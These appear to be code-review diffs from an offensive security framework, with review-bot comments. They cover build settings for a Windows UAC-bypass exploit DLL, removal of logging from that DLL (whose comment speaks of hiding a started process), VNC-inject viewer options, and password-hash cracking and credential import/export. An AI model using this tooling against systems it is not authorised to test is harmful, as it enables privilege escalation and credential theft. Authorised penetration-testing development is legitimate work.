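Review bot: In the `-61,17 +60,7` hunk the merged condition `(ERROR_NO_MORE_FILES == dwErr) && !(mapProcs.empty())` collapses an enumeration error and an empty snapshot into the same silent `false`, so `dwErr` is now fetched only to be compared once and callers of GetProcessList cannot tell the two cases apart. A one-line comment would keep that visible, e.g. `// false for both a Process32First/Next error and an empty snapshot`. In `-140,7 +128,7` the `CLogger::LogLine(strMsg);` line is replaced by a blank, leaving two consecutive empty lines after the commented-out MessageBox, and if `strMsg` is assembled above the hunk only for that call it is now built and never used. Both functions extend beyond the hunks shown.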
@ -1,5 +1,5 @@
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
<ItemGroup Label="ProjectConfigurations">
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
<ProjectConfiguration Include="Debug|Win32">
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
<Configuration>Debug</Configuration>
|
<Configuration>Debug</Configuration>
|
||||||
|
@ -28,23 +28,27 @@
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>true</UseDebugLibraries>
|
<UseDebugLibraries>true</UseDebugLibraries>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
<UseDebugLibraries>false</UseDebugLibraries>
|
<UseDebugLibraries>false</UseDebugLibraries>
|
||||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
<WholeProgramOptimization>false</WholeProgramOptimization>
|
||||||
<CharacterSet>Unicode</CharacterSet>
|
<CharacterSet>Unicode</CharacterSet>
|
||||||
|
<PlatformToolset>v120</PlatformToolset>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
<ImportGroup Label="ExtensionSettings">
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
@ -64,25 +68,30 @@
|
||||||
<PropertyGroup Label="UserMacros" />
|
<PropertyGroup Label="UserMacros" />
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>true</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<LinkIncremental>true</LinkIncremental>
|
<LinkIncremental>true</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)32</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<LinkIncremental>false</LinkIncremental>
|
<LinkIncremental>false</LinkIncremental>
|
||||||
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
|
<OutDir>$(Configuration)\$(Platform)\</OutDir>
|
||||||
<TargetName>$(ProjectName)64</TargetName>
|
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
|
||||||
<GenerateManifest>false</GenerateManifest>
|
<GenerateManifest>false</GenerateManifest>
|
||||||
|
<IntDir>$(Configuration)\$(Platform)\</IntDir>
|
||||||
|
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -90,11 +99,16 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -102,11 +116,16 @@
|
||||||
<WarningLevel>Level3</WarningLevel>
|
<WarningLevel>Level3</WarningLevel>
|
||||||
<Optimization>Disabled</Optimization>
|
<Optimization>Disabled</Optimization>
|
||||||
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<MinimalRebuild>false</MinimalRebuild>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -117,6 +136,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
|
@ -124,6 +144,9 @@
|
||||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<OptimizeReferences>true</OptimizeReferences>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||||
<ClCompile>
|
<ClCompile>
|
||||||
|
@ -134,6 +157,7 @@
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||||
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_WINDOWS;_USRDLL;WIN7ELEVATEDLL_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
<SubSystem>Windows</SubSystem>
|
<SubSystem>Windows</SubSystem>
|
||||||
|
@ -145,6 +169,9 @@
|
||||||
<Path>
|
<Path>
|
||||||
</Path>
|
</Path>
|
||||||
</BuildLog>
|
</BuildLog>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.2 "$(TargetDir)$(TargetFileName)" > NUL</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClInclude Include="stdafx.h" />
|
<ClInclude Include="stdafx.h" />
|
||||||
|
|
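--- a/external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
+++ b/external/source/exploits/bypassuac/Win7ElevateDll/dllmain.cpp
@@ -17,7 +17,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
 // Wee need to hide fact that we've started process thats why we immediately
 // Terminate host application.
 //
-CLogger::LogLine(TEXT("DLL: Hello"));
 
 switch (ul_reason_for_call)
 {
@@ -33,8 +32,6 @@ BOOL APIENTRY DllMain( HMODULE hModule,
 startupInfo.cb = sizeof(startupInfo);
 PROCESS_INFORMATION processInfo = {0};
 
-CLogger::LogLine(TEXT("DLL: TIOR shell="));
-CLogger::LogLine(cmd);
 
 //
 // Create not visible window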
@ -0,0 +1,19 @@
|
||||||
|
<?xml version="1.0" standalone="yes"?>
|
||||||
|
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<PropertyGroup>
|
||||||
|
<SolutionPath>.\Win7Elevate.sln</SolutionPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
|
||||||
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
|
<Target Name="x86">
|
||||||
|
<Message Text="Building bypassuac x86" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
|
||||||
|
<Target Name="x64">
|
||||||
|
<Message Text="Building bypassuac x64" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
|
</Target>
|
||||||
|
</Project>
|
||||||
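Review bot: `Targets="Clean;Rebuild"` on both MSBuild tasks is redundant, since the Rebuild target already runs Clean before Build; `Targets="Rebuild"` expresses the same intent with one target. The `<Project>` element also names no default target, so `msbuild make.msbuild` with no `/target` builds whichever target is listed first; `<Project DefaultTargets="all" xmlns=...>` would make that explicit rather than depend on ordering.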
|
|
|
@ -48,7 +48,14 @@ IF "%ERRORLEVEL%"=="0" (
|
||||||
)
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building bypassuac_injection"
|
ECHO "Building bypassuac (on-disk)"
|
||||||
|
PUSHD bypassuac
|
||||||
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
|
POPD
|
||||||
|
)
|
||||||
|
|
||||||
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
|
ECHO "Building bypassuac (in-memory)"
|
||||||
PUSHD bypassuac_injection
|
PUSHD bypassuac_injection
|
||||||
msbuild.exe make.msbuild /target:%PLAT%
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
POPD
|
POPD
|
||||||
|
|
|
@ -152,14 +152,18 @@ class VncInject
|
||||||
# Note that this says nothing about whether it worked, only that we found
|
# Note that this says nothing about whether it worked, only that we found
|
||||||
# the file.
|
# the file.
|
||||||
#
|
#
|
||||||
def autovnc
|
def autovnc(viewonly=true)
|
||||||
vnc =
|
vnc =
|
||||||
Rex::FileUtils::find_full_path('vncviewer') ||
|
Rex::FileUtils::find_full_path('vncviewer') ||
|
||||||
Rex::FileUtils::find_full_path('vncviewer.exe')
|
Rex::FileUtils::find_full_path('vncviewer.exe')
|
||||||
|
|
||||||
if (vnc)
|
if (vnc)
|
||||||
|
args = []
|
||||||
|
args.push '-viewonly' if viewonly
|
||||||
|
args.push "#{vlhost}::#{vlport}"
|
||||||
|
|
||||||
self.view = framework.threads.spawn("VncViewerWrapper", false) {
|
self.view = framework.threads.spawn("VncViewerWrapper", false) {
|
||||||
system("vncviewer #{vlhost}::#{vlport}")
|
system(vnc, *args)
|
||||||
}
|
}
|
||||||
|
|
||||||
return true
|
return true
|
||||||
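Review bot: The new `viewonly` parameter on `def autovnc(viewonly=true)` is not described in the comment block above it, which still only says that the return value does not indicate success. A YARD line such as `# @param viewonly [Boolean] when true, pass -viewonly so the viewer never sends keyboard or mouse input to the remote desktop` would document both the flag and why the default is the conservative choice. Switching to the multi-argument `system(vnc, *args)` form is a good change, as the host and port are no longer interpolated into a shell command line.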
|
|
|
@ -22,6 +22,18 @@ module VncInjectOptions
|
||||||
"The local host to use for the VNC proxy",
|
"The local host to use for the VNC proxy",
|
||||||
'127.0.0.1'
|
'127.0.0.1'
|
||||||
]),
|
]),
|
||||||
|
OptBool.new('DisableCourtesyShell',
|
||||||
|
[
|
||||||
|
false,
|
||||||
|
"Disables the Metasploit Courtesy shell",
|
||||||
|
true
|
||||||
|
]),
|
||||||
|
OptBool.new('ViewOnly',
|
||||||
|
[
|
||||||
|
false,
|
||||||
|
"Runs the viewer in view mode",
|
||||||
|
true
|
||||||
|
]),
|
||||||
OptBool.new('AUTOVNC',
|
OptBool.new('AUTOVNC',
|
||||||
[
|
[
|
||||||
true,
|
true,
|
||||||
|
@ -32,12 +44,6 @@ module VncInjectOptions
|
||||||
|
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptBool.new('DisableCourtesyShell',
|
|
||||||
[
|
|
||||||
false,
|
|
||||||
"Disables the Metasploit Courtesy shell",
|
|
||||||
false
|
|
||||||
]),
|
|
||||||
OptBool.new('DisableSessionTracking',
|
OptBool.new('DisableSessionTracking',
|
||||||
[
|
[
|
||||||
false,
|
false,
|
||||||
|
@ -79,7 +85,7 @@ module VncInjectOptions
|
||||||
|
|
||||||
# If the AUTOVNC flag is set, launch VNC viewer.
|
# If the AUTOVNC flag is set, launch VNC viewer.
|
||||||
if (datastore['AUTOVNC'] == true)
|
if (datastore['AUTOVNC'] == true)
|
||||||
if (session.autovnc)
|
if (session.autovnc(datastore['ViewOnly']))
|
||||||
print_status("Launched vncviewer.")
|
print_status("Launched vncviewer.")
|
||||||
else
|
else
|
||||||
print_error("Failed to launch vncviewer. Is it installed and in your path?")
|
print_error("Failed to launch vncviewer. Is it installed and in your path?")
|
||||||
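Review bot: The description of the new `ViewOnly` option, `"Runs the viewer in view mode"`, does not tell the operator what "view mode" means; it maps to vncviewer's `-viewonly` flag in `autovnc`, so `"Runs the viewer in view-only mode (no keyboard or mouse input is sent)"` would say what the option actually changes. The same hunk moves `DisableCourtesyShell` out of the advanced options with a different default; a short note in its description that the courtesy shell is now off unless explicitly enabled would help users of saved resource scripts notice the behavior change.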
|
|
|
@ -135,14 +135,21 @@ module Auxiliary::JohnTheRipper
|
||||||
|
|
||||||
::IO.popen(cmd, "rb") do |fd|
|
::IO.popen(cmd, "rb") do |fd|
|
||||||
fd.each_line do |line|
|
fd.each_line do |line|
|
||||||
|
line.chomp!
|
||||||
print_status(line)
|
print_status(line)
|
||||||
if line =~ /(\d+) password hash(es)* cracked, (\d+) left/m
|
if line =~ /(\d+) password hash(es)* cracked, (\d+) left/m
|
||||||
res[:cracked] = $1.to_i
|
res[:cracked] = $1.to_i
|
||||||
res[:uncracked] = $2.to_i
|
res[:uncracked] = $2.to_i
|
||||||
end
|
end
|
||||||
|
|
||||||
bits = line.split(':')
|
bits = line.split(':', -1)
|
||||||
|
|
||||||
|
# If the password had : characters in it, put them back together
|
||||||
|
while bits.length > 7
|
||||||
|
bits[1,2] = bits[1,2].join(":")
|
||||||
|
end
|
||||||
next if not bits[2]
|
next if not bits[2]
|
||||||
|
|
||||||
if (format== 'lm' or format == 'nt')
|
if (format== 'lm' or format == 'nt')
|
||||||
res[ :users ][ bits[0] ] = bits[1]
|
res[ :users ][ bits[0] ] = bits[1]
|
||||||
else
|
else
|
||||||
|
@ -201,7 +208,14 @@ module Auxiliary::JohnTheRipper
|
||||||
end
|
end
|
||||||
|
|
||||||
def john_wordlist_path
|
def john_wordlist_path
|
||||||
::File.join(john_base_path, "wordlists", "password.lst")
|
# We ship it under wordlists/
|
||||||
|
path = ::File.join(john_base_path, "wordlists", "password.lst")
|
||||||
|
# magnumripper/JohnTheRipper repo keeps it under run/
|
||||||
|
unless ::File.file? path
|
||||||
|
path = ::File.join(john_base_path, "run", "password.lst")
|
||||||
|
end
|
||||||
|
|
||||||
|
path
|
||||||
end
|
end
|
||||||
|
|
||||||
def john_binary_path
|
def john_binary_path
|
||||||
|
@ -209,6 +223,7 @@ module Auxiliary::JohnTheRipper
|
||||||
if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
|
if datastore['JOHN_PATH'] and ::File.file?(datastore['JOHN_PATH'])
|
||||||
path = datastore['JOHN_PATH']
|
path = datastore['JOHN_PATH']
|
||||||
::FileUtils.chmod(0755, path) rescue nil
|
::FileUtils.chmod(0755, path) rescue nil
|
||||||
|
return path
|
||||||
end
|
end
|
||||||
|
|
||||||
if not @run_path
|
if not @run_path
|
||||||
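Review bot: The `while bits.length > 7` loop after `bits = line.split(':', -1)` assumes every `--show` line has exactly seven colon-separated fields, but if john echoes the pwdump trailer for LM/NT input (`user:pass:uid:LM:NT:::`), the `-1` limit keeps the three trailing empty fields, the line splits into eight pieces, and the loop folds the uid into the password stored at `bits[1]`. Please check this against the real `--show` output for the `lm`/`nt` formats and record the expected layout next to the constant, e.g. `# john --show prints user:pass:uid:gid:gecos:home:shell (7 fields); anything beyond that is a ':' inside the password`. The enclosing `popen` block starts before this hunk. The added `return path` in `john_binary_path` fixes a genuine fall-through, since a configured `JOHN_PATH` was previously chmod'ed and then ignored.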
|
|
|
@ -1547,9 +1547,9 @@ class DBManager
|
||||||
|
|
||||||
ret = {}
|
ret = {}
|
||||||
|
|
||||||
#Check to see if the creds already exist. We look also for a downcased username with the
|
# Check to see if the creds already exist. We look also for a downcased username with the
|
||||||
#same password because we can fairly safely assume they are not in fact two seperate creds.
|
# same password because we can fairly safely assume they are not in fact two seperate creds.
|
||||||
#this allows us to hedge against duplication of creds in the DB.
|
# this allows us to hedge against duplication of creds in the DB.
|
||||||
|
|
||||||
if duplicate_ok
|
if duplicate_ok
|
||||||
# If duplicate usernames are okay, find by both user and password (allows
|
# If duplicate usernames are okay, find by both user and password (allows
|
||||||
|
@ -3171,7 +3171,7 @@ class DBManager
|
||||||
data = ""
|
data = ""
|
||||||
::File.open(filename, 'rb') do |f|
|
::File.open(filename, 'rb') do |f|
|
||||||
data = f.read(f.stat.size)
|
data = f.read(f.stat.size)
|
||||||
end
|
end
|
||||||
import_wapiti_xml(args.merge(:data => data))
|
import_wapiti_xml(args.merge(:data => data))
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -3487,16 +3487,29 @@ class DBManager
|
||||||
sname = $6
|
sname = $6
|
||||||
end
|
end
|
||||||
when /^[\s]*Warning:/
|
when /^[\s]*Warning:/
|
||||||
next # Discard warning messages.
|
# Discard warning messages.
|
||||||
when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/ # SMB Hash
|
next
|
||||||
|
|
||||||
|
# SMB Hash
|
||||||
|
when /^[\s]*([^\s:]+):[0-9]+:([A-Fa-f0-9]+:[A-Fa-f0-9]+):[^\s]*$/
|
||||||
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
||||||
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
|
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
|
||||||
ptype = "smb_hash"
|
ptype = "smb_hash"
|
||||||
when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/ # SMB Hash
|
|
||||||
|
# SMB Hash
|
||||||
|
when /^[\s]*([^\s:]+):([0-9]+):NO PASSWORD\*+:NO PASSWORD\*+[^\s]*$/
|
||||||
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
||||||
pass = ""
|
pass = ""
|
||||||
ptype = "smb_hash"
|
ptype = "smb_hash"
|
||||||
when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n # Must be a user pass
|
|
||||||
|
# SMB Hash with cracked plaintext, or just plain old plaintext
|
||||||
|
when /^[\s]*([^\s:]+):(.+):[A-Fa-f0-9]*:[A-Fa-f0-9]*:::$/
|
||||||
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : $1
|
||||||
|
pass = ([nil, "<BLANK>"].include?($2)) ? "" : $2
|
||||||
|
ptype = "password"
|
||||||
|
|
||||||
|
# Must be a user pass
|
||||||
|
when /^[\s]*([\x21-\x7f]+)[\s]+([\x21-\x7f]+)?/n
|
||||||
user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)
|
user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)
|
||||||
pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)
|
pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)
|
||||||
ptype = "password"
|
ptype = "password"
|
||||||
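Review bot: The new `user:pass:::` branch stores `$1` and `$2` verbatim, while the plain user/pass branch directly below it passes both through `dehex`; since the text exporter in this same commit writes `Rex::Text.ascii_safe_hex(...)` values in exactly this `user:pass:::` layout, a cred containing escaped bytes would not survive an export/import round trip. The fix is to mirror the sibling branch: `user = ([nil, "<BLANK>"].include?($1)) ? "" : dehex($1)` and `pass = ([nil, "<BLANK>"].include?($2)) ? "" : dehex($2)`. The enclosing `case` opens before this hunk, so I cannot see whether an earlier branch already handles this.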
|
|
|
@ -149,11 +149,11 @@ class Export
|
||||||
report_file.puts "Warning: could not read the private key '#{c.pass}'."
|
report_file.puts "Warning: could not read the private key '#{c.pass}'."
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
else "text"
|
when "text"
|
||||||
data.each do |c|
|
data.each do |c|
|
||||||
user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.user, true)
|
user = (c.user.nil? || c.user.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.user, true)
|
||||||
pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.pass, true)
|
pass = (c.pass.nil? || c.pass.empty?) ? "<BLANK>" : Rex::Text.ascii_safe_hex(c.pass, true)
|
||||||
report_file.write "%s %s\n" % [user,pass]
|
report_file.write "%s:%s:::\n" % [user,pass]
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
report_file.flush
|
report_file.flush
|
||||||
|
@ -372,7 +372,7 @@ class Export
|
||||||
def extract_module_detail_info(report_file)
|
def extract_module_detail_info(report_file)
|
||||||
Mdm::Module::Detail.all.each do |m|
|
Mdm::Module::Detail.all.each do |m|
|
||||||
report_file.write("<module_detail>\n")
|
report_file.write("<module_detail>\n")
|
||||||
m_id = m.attributes["id"]
|
#m_id = m.attributes["id"]
|
||||||
|
|
||||||
# Module attributes
|
# Module attributes
|
||||||
m.attributes.each_pair do |k,v|
|
m.attributes.each_pair do |k,v|
|
||||||
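Review bot: Replacing `else "text"` with `when "text"` means a format value that matches none of the branches now falls out of the `case` with nothing written, and the report file is silently empty; unless another `else` exists above this hunk (the `case` opens outside it), an explicit `else raise ArgumentError, "unsupported export format"` would surface the mistake instead. In the second hunk, `#m_id = m.attributes["id"]` leaves dead code behind as a comment; delete the line rather than commenting it out, since the value is never used below.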
|
|
|
@ -139,8 +139,10 @@ protected
|
||||||
|
|
||||||
# Prefer the target's platform/architecture information, but use
|
# Prefer the target's platform/architecture information, but use
|
||||||
# the module's if no target specific information exists
|
# the module's if no target specific information exists
|
||||||
|
opts[:platform] ||= payload_instance.platform if self.respond_to? :payload_instance
|
||||||
opts[:platform] ||= target_platform if self.respond_to? :target_platform
|
opts[:platform] ||= target_platform if self.respond_to? :target_platform
|
||||||
opts[:platform] ||= platform if self.respond_to? :platform
|
opts[:platform] ||= platform if self.respond_to? :platform
|
||||||
|
